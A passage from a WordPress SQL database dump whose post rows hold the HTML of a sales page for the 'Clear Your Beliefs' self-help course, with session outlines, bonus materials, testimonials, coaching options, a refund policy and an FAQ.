through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 14:20:22', '2014-06-17 19:20:22', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(926, 4194, '2014-06-17 14:21:11', '2014-06-17 19:21:11', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="wp-image-300 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="wp-image-316 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 50px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core 